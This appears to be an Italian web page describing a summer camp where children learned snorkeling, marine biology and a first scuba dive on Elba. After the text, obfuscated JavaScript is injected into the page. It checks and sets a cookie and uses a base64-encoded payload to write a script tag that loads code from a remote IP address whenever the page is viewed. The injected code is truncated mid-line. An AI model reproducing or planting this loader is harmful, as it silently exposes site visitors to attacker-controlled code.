Abbiamo avuto il piacere di passare un’intensa settimana con un gruppo di splendidi bambini.
Nella località di Porto Azzurro si è svolto un campo estivo molto particolare, dedicato ai bambini dagli 11 ai 13 anni, provenienti da una parte d’Italia.
Tutti loro avevano qualcosa in comune: l’amore per il mare e la curiosità di scoprire i suoi segreti.
Non potevano che scegliere un mare altrettanto speciale, quello dell’Isola d’Elba.
Con maschera, pinne e boccaglio accompagnati da biologi marini e istruttori subacquei, hanno scoperto ogni angolo del mare, hanno osservato, hanno vissuto le emozioni che solo il mare può trasmettere.
Snorkeling ma non solo!
Armati di tanta curiosità hanno utilizzato strumentazione scientifica mettendosi nei panni di un vero biologo marino, analizzando gli organismi del plancton, del bentos e materiale spiaggiato.
Laboratori ma non solo!
L’esperienza del primo respiro subacqueo e la splendida sensazione di “volare” nell’ambiente marino.
A pochi metri di profondità in massima sicurezza si sono trasformati in subacquei per un giorno.
L’espressione dei loro volti non riusciamo a descriverla ma ci rimarrà impressa così come i loro sguardi, sul traghetto, quando si allontanavano dall’Elba e dalle esperienze vissute.
Un’isola che ha colpito il cuore di ognuno di loro con la sua magia!
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘